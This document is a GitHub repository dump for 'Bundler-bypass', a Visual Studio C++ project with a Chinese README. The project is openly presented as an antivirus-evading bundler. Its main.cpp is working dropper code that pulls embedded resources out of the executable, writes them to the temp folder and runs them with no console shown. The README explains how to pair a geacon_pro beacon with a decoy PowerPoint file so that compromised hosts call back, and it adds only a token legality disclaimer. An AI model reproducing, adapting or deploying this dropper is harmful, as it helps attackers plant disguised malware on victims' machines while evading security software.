├── Bundler_C.sln ├── Bundler_C ├── Bundler_C.aps ├── Bundler_C.vcxproj ├── Bundler_C.vcxproj.filters ├── Bundler_C.vcxproj.user ├── main.cpp └── x64 │ ├── Debug │ ├── Bundler_C.Build.CppClean.log │ ├── Bundler_C.ilk │ ├── Bundler_C.log │ ├── Bundler_C.res │ ├── Bundler_C.tlog │ │ ├── Bundler_C.lastbuildstate │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ ├── link.write.1.tlog │ │ ├── rc.command.1.tlog │ │ ├── rc.read.1.tlog │ │ └── rc.write.1.tlog │ ├── Bundler_C.vcxproj.FileListAbsolute.txt │ ├── main.obj │ ├── vc143.idb │ └── vc143.pdb │ └── Release │ ├── Bundler_C.Build.CppClean.log │ ├── Bundler_C.exe.recipe │ ├── Bundler_C.iobj │ ├── Bundler_C.ipdb │ ├── Bundler_C.log │ ├── Bundler_C.res │ ├── Bundler_C.tlog │ ├── Bundler_C.lastbuildstate │ ├── CL.command.1.tlog │ ├── CL.read.1.tlog │ ├── CL.write.1.tlog │ ├── link.command.1.tlog │ ├── link.read.1.tlog │ ├── link.write.1.tlog │ ├── rc.command.1.tlog │ ├── rc.read.1.tlog │ └── rc.write.1.tlog │ ├── Bundler_C.vcxproj.FileListAbsolute.txt │ ├── RCa40440 │ ├── RCa46040 │ ├── RCa46788 │ ├── RCa46932 │ ├── main.obj │ └── vc143.pdb ├── README.md └── x64 ├── Debug └── Bundler_C.pdb └── Release └── Bundler_C.pdb /Bundler_C.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.3.32929.385 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bundler_C", "Bundler_C\Bundler_C.vcxproj", "{49646F87-8AE5-4C61-964B-0284B031C748}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {49646F87-8AE5-4C61-964B-0284B031C748}.Debug|x64.ActiveCfg = Debug|x64 17 | {49646F87-8AE5-4C61-964B-0284B031C748}.Debug|x64.Build.0 = Debug|x64 18 | {49646F87-8AE5-4C61-964B-0284B031C748}.Debug|x86.ActiveCfg = Debug|Win32 19 | {49646F87-8AE5-4C61-964B-0284B031C748}.Debug|x86.Build.0 = Debug|Win32 20 | {49646F87-8AE5-4C61-964B-0284B031C748}.Release|x64.ActiveCfg = Release|x64 21 | {49646F87-8AE5-4C61-964B-0284B031C748}.Release|x64.Build.0 = Release|x64 22 | {49646F87-8AE5-4C61-964B-0284B031C748}.Release|x86.ActiveCfg = Release|Win32 23 | {49646F87-8AE5-4C61-964B-0284B031C748}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {848BB66C-F8FA-42D2-AA34-5021DB0D5E02} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Bundler_C/Bundler_C.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/Bundler_C.aps -------------------------------------------------------------------------------- /Bundler_C/Bundler_C.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {49646f87-8ae5-4c61-964b-0284b031c748} 25 | BundlerC 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | MultiThreadedDebug 108 | 109 | 110 | Console 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | true 119 | true 120 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 121 | true 122 | 123 | 124 | Console 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | -------------------------------------------------------------------------------- /Bundler_C/Bundler_C.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /Bundler_C/Bundler_C.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Bundler_C/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" ) 4 | 5 | using namespace std; 6 | 7 | static int num = 0; 8 | 9 | void EnumTypesFunc(HMODULE hModule, LPTSTR lpType, LPTSTR lParam) { 10 | num++; 11 | char* a = new char[10]; 12 | WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, a, 6, NULL, FALSE); 13 | string fileType = string(a); 14 | 15 | CHAR PathFileName[MAX_PATH] = { 0 }; 16 | CHAR FileName[MAX_PATH] = { 0 }; 17 | 18 | HRSRC Resource = FindResourceA(NULL, MAKEINTRESOURCEA(100 + num), fileType.c_str()); 19 | HGLOBAL ResourceGlobal = LoadResource(NULL, Resource); 20 | DWORD FileSize = SizeofResource(NULL, Resource); 21 | LPVOID PFILE = LockResource(ResourceGlobal); 22 | GetModuleFileNameA(NULL, PathFileName, MAX_PATH); 23 | 24 | strcpy_s(FileName, strrchr(PathFileName, '\\') + 1); 25 | string FileNameFinal = FileName; 26 | FileNameFinal.replace(FileNameFinal.rfind('.'), 4, "." + fileType); 27 | 28 | CHAR czTempPath[MAX_PATH] = { 0 }; 29 | GetTempPathA(MAX_PATH, czTempPath); 30 | FileNameFinal = czTempPath + FileNameFinal; 31 | 32 | strcpy_s(FileName, FileNameFinal.c_str()); 33 | 34 | HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL); 35 | DWORD dwSize; 36 | WriteFile(FILE, PFILE, FileSize, &dwSize, NULL); 37 | CloseHandle(FILE); 38 | 39 | 40 | Sleep(100); 41 | SHELLEXECUTEINFOA shellexecute = { 0 }; 42 | shellexecute.cbSize = sizeof(shellexecute); 43 | shellexecute.lpFile = FileName; 44 | shellexecute.nShow = SW_SHOW; 45 | ShellExecuteExA(&shellexecute); 46 | } 47 | 48 | 49 | int main(int argc, char* argv[]) 50 | { 51 | EnumResourceTypes(NULL, 52 | (ENUMRESTYPEPROC)EnumTypesFunc, 53 | 0); 54 | } 55 | -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\vc143.pdb 2 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\vc143.idb 3 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\main.obj 4 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.ilk 5 | d:\studying\programming\bypassantivirus\bundler_c\x64\debug\bundler_c.exe 6 | d:\studying\programming\bypassantivirus\bundler_c\x64\debug\bundler_c.pdb 7 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.res 8 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\cl.command.1.tlog 9 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\cl.read.1.tlog 10 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\cl.write.1.tlog 11 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\link.command.1.tlog 12 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\link.read.1.tlog 13 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\link.write.1.tlog 14 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\rc.command.1.tlog 15 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\rc.read.1.tlog 16 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\debug\bundler_c.tlog\rc.write.1.tlog 17 | -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.ilk -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.log: -------------------------------------------------------------------------------- 1 |  main.cpp 2 | Bundler_C.vcxproj -> D:\Studying\Programming\BypassAntiVirus\Bundler_C\x64\Debug\Bundler_C.exe 3 | -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.res -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/Bundler_C.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.33.31629:TargetPlatformVersion=10.0.19041.0: 2 | Debug|x64|D:\Studying\Programming\BypassAntiVirus\Bundler_C\| 3 | -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/rc.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/rc.command.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/rc.read.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.tlog/rc.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.tlog/rc.write.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/Bundler_C.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/Bundler_C.vcxproj.FileListAbsolute.txt -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/main.obj -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/vc143.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/vc143.idb -------------------------------------------------------------------------------- /Bundler_C/x64/Debug/vc143.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Debug/vc143.pdb -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\vc143.pdb 2 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\main.obj 3 | d:\studying\programming\bypassantivirus\bundler_c\x64\release\bundler_c.exe 4 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.ipdb 5 | d:\studying\programming\bypassantivirus\bundler_c\x64\release\bundler_c.pdb 6 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.iobj 7 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.res 8 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\cl.command.1.tlog 9 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\cl.read.1.tlog 10 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\cl.write.1.tlog 11 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\link.command.1.tlog 12 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\link.read.1.tlog 13 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\link.write.1.tlog 14 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\rc.command.1.tlog 15 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\rc.read.1.tlog 16 | d:\studying\programming\bypassantivirus\bundler_c\bundler_c\x64\release\bundler_c.tlog\rc.write.1.tlog 17 | -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | D:\Studying\Programming\BypassAntiVirus\Bundler_C\x64\Release\Bundler_C.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.iobj -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.ipdb -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.log: -------------------------------------------------------------------------------- 1 |  main.cpp 2 | 正在生成代码 3 | Previous IPDB not found, fall back to full compilation. 4 | All 97 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 5 | 已完成代码的生成 6 | Bundler_C.vcxproj -> D:\Studying\Programming\BypassAntiVirus\Bundler_C\x64\Release\Bundler_C.exe 7 | -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.res -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/Bundler_C.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.33.31629:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|D:\Studying\Programming\BypassAntiVirus\Bundler_C\| 3 | -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/rc.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/rc.command.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/rc.read.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.tlog/rc.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.tlog/rc.write.1.tlog -------------------------------------------------------------------------------- /Bundler_C/x64/Release/Bundler_C.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/Bundler_C.vcxproj.FileListAbsolute.txt -------------------------------------------------------------------------------- /Bundler_C/x64/Release/RCa40440: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/RCa40440 -------------------------------------------------------------------------------- /Bundler_C/x64/Release/RCa46040: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/RCa46040 -------------------------------------------------------------------------------- /Bundler_C/x64/Release/RCa46788: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/RCa46788 -------------------------------------------------------------------------------- /Bundler_C/x64/Release/RCa46932: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/RCa46932 -------------------------------------------------------------------------------- /Bundler_C/x64/Release/main.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/main.obj -------------------------------------------------------------------------------- /Bundler_C/x64/Release/vc143.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/Bundler_C/x64/Release/vc143.pdb -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bundler-bypass 2 | 3 | 免杀捆绑器,过国内主流杀软。A Bundler bypass anti-virus 4 | 5 | **请勿使用于任何非法用途,由此产生的后果自行承担。** 6 | 7 | 思路借鉴了[该文章](https://forum.butian.net/share/1778),然后做了一些小改动,如取消了自删除功能,可以进行多次的上线,将文件写到了系统temp目录中并打开。 8 | 9 | 整体思路为在vs中打包静态资源文件,然后遍历打包的资源文件并将其写到主机的temp目录中,之后用ShellExecuteExA函数来打开。 10 | 11 | 使用方法为: 12 | 13 | 1、右键资源文件并添加资源,选择导入中的所有文件来选择我们想捆绑的文件和exe文件,并把资源类型赋值为文件的后缀,如pptx和exe 14 | 15 | ![image](https://user-images.githubusercontent.com/48757788/200118397-1a05cf8d-bb7e-4e63-94e0-5e11bf2f7df1.png) 16 | 17 | 2、将exe文件和捆绑的文件按照步骤一打包好了后,编译。 18 | 19 | 这里以geacon_pro捆绑一个pptx文件为例来上线: 20 | 21 | ![1667649118485](https://user-images.githubusercontent.com/48757788/200118502-94241fb7-526c-41c4-92b1-b6c9375223f7.jpg) 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /x64/Debug/Bundler_C.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/x64/Debug/Bundler_C.pdb -------------------------------------------------------------------------------- /x64/Release/Bundler_C.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/testxxxzzz/Bundler-bypass/32a5b9aedf3bc3931829251511db7a7fb57e98c3/x64/Release/Bundler_C.pdb --------------------------------------------------------------------------------